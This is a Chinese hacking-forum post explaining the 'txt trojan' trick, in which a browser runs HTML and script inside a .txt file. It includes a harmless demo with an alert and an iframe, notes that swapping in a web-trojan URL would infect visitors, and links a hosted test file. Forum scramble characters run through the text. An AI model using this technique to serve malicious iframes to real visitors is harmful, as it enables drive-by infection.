|
  
- 帖子
- 154
- 积分
- 616
- 威望
- 754
- 金钱
- 898
- 在线时间
- 81 小时
    
|
原创作者:Ksnort
6 m* o# ^" ]" K/ @! V9 h- p原创出处:【3.A.S.T】网络安全技术团队
. f# x2 M+ W# S8 J& b) k7 m( F: [; j尊重作者,转载请说明出处
: Q; C8 Y6 h: O2 \1 f: }* K# l+ r$ v/ w
7 U# U2 ]# {9 I3 B! I今天又见txt木马,其实这个东西老早就有了的东西,我一开始接触病毒的时候就看过这方面的文章,今天发现居然依然有那么多人不了解这个,于是写点东西给大家看下。
4 ]* X& v. |) s% q( k8 u3 y5 S9 G, @5 U3 }3 v# {
大家都知道正常状况下txt文件时不能被绑马的,捆绑后后缀肯定是会改变的,而浏览器却依然能解析脚本里的东西。4 K6 u. |, c! H* U) U) f9 q, N) t
2 b) h* d4 }( J* q X于是写下如下代码- <script>alert('txt木马测试')</script>
- <iframe src=http://www.baidu.com width=500 height=500></iframe>
复制代码 将代码保存为 txt_troy.txt 然后上传到空间。
, X0 ~ n1 F0 `# _6 B4 R% a% Z( U% f) _$ |6 _
如果那个”txt木马测试“和百度地址是网马地址的话后果可想而知6 f) \4 v* g \- u2 W3 K8 s. X1 }
4 r( N2 X) Y4 }/ _8 @给大家个连接自己测试吧。8 w; z z' W) ^. A. i+ ~' J# J
$ V/ S; m3 T' T- u# a3 c- n
http://m.99081.com/mumatroy/txt_troy.txt
9 x9 \5 V3 @0 d1 _1 b& M: r
: _" K9 M5 ?3 I很抱歉 本人穷没钱没空间和域名 用的免费的, |
-
1
评分人数
-
|